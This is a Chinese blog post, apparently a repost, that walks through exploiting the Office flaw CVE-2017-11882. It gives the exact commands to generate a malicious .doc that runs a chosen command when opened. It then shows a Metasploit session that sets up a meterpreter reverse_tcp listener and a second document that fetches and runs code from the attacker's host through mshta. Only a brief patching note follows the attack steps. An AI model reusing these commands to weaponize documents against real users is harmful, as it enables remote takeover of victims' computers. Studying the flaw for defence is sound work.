博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)
阅读量:4930 次
发布时间:2019-06-11

本文共 2370 字,大约阅读时间需要 7 分钟。

Preface

  这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下。

  利用脚本 ,后面的参考链接都有成功的比较详细的案例了。

  主要是要用到如图中的两个脚本,example文件夹中有个doc,应该直接打开就能弹计算器了。

影响版本

  • Office 365
  • Microsoft Office 2000   
  • Microsoft Office 2003   
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

复现过程

国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882

这里我们使用的是Ridter师傅改进过的脚本:https://github.com/Ridter/CVE-2017-11882/

生成漏洞doc文件弹计算器

  生成漏洞doc文件,可以弹出计算器如下:(脚本在Github传送地址)

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc[*] Done ! output file >> test.doc <<

  用命令生成test.doc后,用Offcie 2013打开这个文件,可以看到在打开doc文件的时候,弹出计算器。

   除了可以弹计算器外,还能获取shell。

生成漏洞doc文件拿shell

  这里我们参考链接2,使用metasploit,将脚本放到metasploit exploit的某个路径下:

  我的kali下的metasploit所在路径是:/usr/share/metasploit-framework, 可以放在如下目录:(这里我们新创建一个new-exps目录存放这个脚本)

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# pwd/usr/share/metasploit-framework/modules/exploits/windows/new-expsroot@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# lsPS_shell.rb

  这样在启动msf时就能直接使用了:

msf > use exploit/windows/new-exps/PS_shell

  漏洞利用过程:

msf > use exploit/windows/new-exps/PS_shell msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(PS_shell) > set lhost 192.168.1.102lhost => 192.168.1.102msf exploit(PS_shell) > set uripath abcuripath => abcmsf exploit(PS_shell) > exploit[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.1.102:4444 msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/abc[*] Local IP: http://192.168.1.102:8080/abc[*] Server started.[*] Place the following DDE in an MS document:mshta.exe "http://192.168.1.102:8080/abc"

  从上面可以看出,我们要连接到这个地址:http://192.168.1.102:8080/abc

  我们需要用上面那个脚本重新生成这样一个存在漏洞的doc文件:  

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "mshta http://192.168.1.102:8080/abc" -o test.doc[*] Done ! output file >> test.doc <<

  再用Office打开这个doc,就能拿到meterpreter了:

  OK, 利用过程就这样吧。(右键在新标签页中打开图片查看更清晰哦)

 

  更多手法请参考:

    

 

漏洞修复

(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882  更新补丁进行修补 (2)开启Windows Update功能,定期对系统进行自动更新

参考

  

  

转载于:https://www.cnblogs.com/Hi-blog/p/7878054.html

你可能感兴趣的文章
1091 线段的重叠
查看>>
UVA 11134 Fabled Rooks (贪心)
查看>>
员工选票系统-java
查看>>
C语言、C语言的起源以及类似C语言的编程语言的历史简直不要太漫长,我简单总结列表如下:...
查看>>
html中布局,让下一个子元素占据剩余的高度
查看>>
sp1.3-1.4 Neural Networks and Deep Learning
查看>>
JavaScript易错知识点整理
查看>>
Biological Clocks
查看>>
2018-10-11
查看>>
国内NLP的那些人那些会
查看>>
ffmpeg转成h264编码格式、moov(meta数据)移动到头部、码率做一定压缩、分辨率也降下来...
查看>>
[原创]java WEB学习笔记94:Hibernate学习之路---session 的管理,Session 对象的生命周期与本地线程绑定...
查看>>
SharePoint 2010 母版页定制小思路介绍
查看>>
PHP对大小写敏感问题的处理比较乱,写代码时可能偶尔出问题,所以这里总结一下。...
查看>>
poj 3463(最短路和比最短路大1的路的数量)(dijkstra)
查看>>
苹果App Store公布最新应用审核标准:更加严格
查看>>
DbUtils类
查看>>
Vuejs开发问题总结
查看>>
JDBC request的查询结果作为下一个jdbc request的入参—简单
查看>>
自动化测试页面元素被遮挡
查看>>